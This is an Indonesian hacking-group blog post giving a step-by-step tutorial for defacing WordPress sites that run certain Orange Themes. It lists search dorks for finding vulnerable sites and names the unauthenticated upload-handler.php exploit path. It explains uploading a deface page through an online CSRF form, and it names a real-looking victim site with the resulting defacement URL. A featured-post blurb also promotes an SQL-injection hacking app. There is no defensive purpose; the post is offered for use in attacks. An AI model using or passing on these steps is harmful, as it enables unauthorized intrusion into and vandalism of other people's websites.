input license here

Report Abuse

Search This Blog

Featured Post

Download Aplikasi DroidSQLI Mods v1.0

Assalamualaikum,halo pengunjung selamat datang di blog Bomber Cyber Army, pada artikel kali ini saya akan memberikan Download Aplikasi DroidSQLi Mods v1.0. Droid SQLI DroidSQLi adalah aplikasi yang sangat mengagumkan dan sempurna untuk meretas dan m…

Tutorial Deface Poc Wp Orange Themes


 Assalamualaikum kali ini saya akan materi Tutorial Deface Poc Wp Orange Themes


Oke untuk bahan bahan nya


•Hp/Pc•

-> Dork

-> Exploit

-> Sc Deface


Dork:

>> inurl:/wp-content/themes/kernel-theme

>> inurl:/wp-content/themes/bordeaux-theme

>> inurl:/wp-content/themes/bulteno-theme

>> inurl:/wp-content/themes/rayoflight-theme


Kembangin Lagi


Exploit:

>> wp-content/themes/rockstar-theme/functions/upload-handler.php


Target? 

>> https://www.123rock.net


Nahh di situ kalian tinggal kasih exploit nya


Contoh >> https://www.123rock.net/wp-content/themes/rockstar-theme/functions/upload-handler.php


Nah kalo tampilan nya kek gini tandanya web nya vuln langsung aja salin lalu ke csrf online


Nahh site ny kalian paste di URL dan POST FILE kalian isi dengan orange_themes lalu click lock the target


Nahh terus kalian upload sc deface kesayangan kalian dan click go


Nahh kalo keluar nama sc yg kalian upload itu tanda nya berhasil ke upload tinggal panggil aja sc nya kalian

Caranya?
>> www.site.com/wp-content/uploads/tahun/bulan/sclu.html

Oke disini saya perjelas pake punya saya
>> https://www.123rock.net/wp-content/uploads/2021/07/bombercyberarmy.html


Dan boom jadi heker :v
Sekian materi saya terima kasih

Silahkan baca dan pahami dan smoga bermanfaat 


BomberCyberArmy
Gw F4K3_5M1LE

Related Posts

Post a Comment